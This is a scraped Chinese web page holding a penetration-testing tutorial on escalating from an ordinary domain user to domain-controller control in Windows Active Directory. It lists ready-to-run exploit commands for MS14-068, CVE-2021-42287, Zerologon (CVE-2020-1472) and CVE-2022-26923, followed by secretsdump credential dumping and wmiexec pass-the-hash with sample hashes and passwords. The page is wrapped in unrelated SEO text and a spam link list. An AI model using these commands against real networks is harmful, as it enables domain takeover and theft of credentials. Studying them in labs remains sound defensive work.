当前位置: 首页 > news >正文

最大的域名注册网站是那个设计师 个人网站

最大的域名注册网站是那个,设计师 个人网站,这么做网站,知识产权代理#实战场景:(用户到域控) 通过技术手段拿下内网域环境下某一台服务器权限或某主机上的域用户账号密码后, 与AD域控网络通讯正常的情况下,可直接使用域控提权CVE漏洞进行域控权限提升。 #WIN-AD域控提权-CVE-2014-6324…

#实战场景:(用户到域控)

通过技术手段拿下内网域环境下某一台服务器权限或某主机上的域用户账号密码后,

与AD域控网络通讯正常的情况下,可直接使用域控提权CVE漏洞进行域控权限提升。

#WIN-AD域控提权-CVE-2014-6324

前提条件:

1、需要域用户账号密码

2、一台主机的管理员权限

whoami /user

net time /domain

net config workstation

ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址

ms14-068.exe -u mary@god.org -p admin!@#45 -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d OWA2010CN-God.god.org

kerberos::list

kerberos::purge

kerberos::ptc "TGT_test02@test.lab.ccache"

dir \\OWA2010CN-God.god.org\C$

psexec \\OWA2010CN-God.god.org cmd

#WIN-AD域控提权-CVE-2021-42287(外网机器是打不到内网域控的)

只需要域用户账号密码

https://github.com/WazeHell/sam-the-admin

python3 sam_the_admin.py god/'webadmin:admin!@#45' -dc-ip 192.168.3.21 -shell

#WIN-AD域控提权-CVE-2020-1472

CVE-2020-1472是继MS17010之后好用的NetLogon特权域控提权漏洞,

影响Windows Server 2008R2至Windows Server 2019的多个版本系统,

只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞.

该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为Windows.

计算机名:nbtscan -v -h 192.168.3.21

漏洞检测:python3 zerologon_tester.py OWA2010CN-GOD 192.168.3.21

重置空密码:python3 cve-2020-1472-exploit.py OWA2010CN-GOD 192.168.3.21

连接后导出:python3 secretsdump.py god.org/OWA2010CN-GOD\$@192.168.3.21 -no-pass

WMI连接反弹:

python3 wmiexec.py god/administrator@192.168.3.21 -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7

#WIN-AD域控提权-CVE-2022-26923

前提条件:(在攻击机运行)

1、一个域内普通账号

2、域内存在证书服务器

Kali添加访问域内信息 /etc/hosts

192.168.3.111 xiaodi.local

192.168.3.111 xiaodi-DC-CA

192.168.3.111 DC.xiaodi.local

获取CA结构名和计算机名

certutil -config - -ping

域内信息

192.168.3.111

test Pass123

xiaodi-DC-CA

DC.xiaodi.local

1申请证书:(Certipy

certipy req 'xiaodi.local/test:Pass123@DC.xiaodi.local' -ca xiaodi-DC-CA -template User -debug

2检测证书(Certipy)

certipy auth -pfx test.pfx

3添加用户:(bloodyAD)

python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.3.111 addComputer pwnmachine 'CVEPassword1234*'

4设置属性:bloodyAD

python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.3.111 setAttribute 'CN=pwnmachine,CN=Computers,DC=xiaodi,DC=local' dNSHostName '["DC.xiaodi.local"]'

5申请证书:(Certipy)

certipy req 'xiaodi.local/pwnmachine$:CVEPassword1234*@192.168.3.111' -template Machine -dc-ip 192.168.3.111 -ca xiaodi-DC-CA -debug

6检测证书:(Certipy)

certipy auth -pfx ./dc.pfx -dc-ip 192.168.3.111

7获取HASH:(impacket)

python3 secretsdump.py 'xiaodi.local/dc$@DC.xiaodi.local' -hashes :b6046c1026699b59301ff66341838df4

8利用HASH:impacket

python3 wmiexec.py xiaodi.local/administrator@192.168.3.111 -hashes aad3b435b51404eeaad3b435b51404ee:e6f01fc9f2a0dc96871220f7787164bd

http://www.yayakq.cn/news/584035/

相关文章:

  • 音乐影视类网站建设做跨境电商需要多少钱
  • 网站建设公司销售浏览器一打开就是2345网址导航
  • 免费制作购物网站wordpress ajax搜索功能
  • 1千万人网站维护成本深圳龙岗网站维护
  • 鄂州北京网站建设沈阳网站设计制作
  • 罗湖附近公司做网站建设哪家便宜广州海珠区核酸检测点
  • 小说网站静态模板微博问答网站开发
  • 网站建设开发背景一个网页前端和后端
  • 婚纱网站内容制作沈阳网站建设-中国互联
  • 网上学设计哪个网站好网业搜索
  • 怎样提高网站访问速度android开发基础教程
  • 网站备案要如何取消个人博客网站总结
  • 西安网站建设gj沈阳专业工装公司
  • 宝钢工程建设有限公司网站wordpress企业网站开发
  • 在哪个网站申请建设资质网站建设推广报价单
  • 网站创作思路营销导向的企业网站优化
  • 永年区住房和城乡建设局网站免费的ftp网站
  • 哪里有免费的网站推广服务给浏览器加速的加速器
  • 公司网站内容模块布局苏州品牌网站设计企业
  • 天津市建设工程造价管理协会网站在线网页传输文件
  • 制作网站第一步开锁都在什么网站做
  • 网站设计英语做响应式的网站
  • 静态网站什么样卖衣服的网站排名
  • 温州建网站业务人员求一个做烧肉的网站
  • 广州哪里可以做网站wordpress文件
  • 企业门户网站管理制度上海有几个区几个县
  • 备案网站建设书wordpress转cms
  • 网站开发流程进度表国家信息公示网查营业执照年报
  • 做网站找模板wordpress 支付宝 微信支付
  • 网站建设公司信息有哪些做农产品的网站有哪些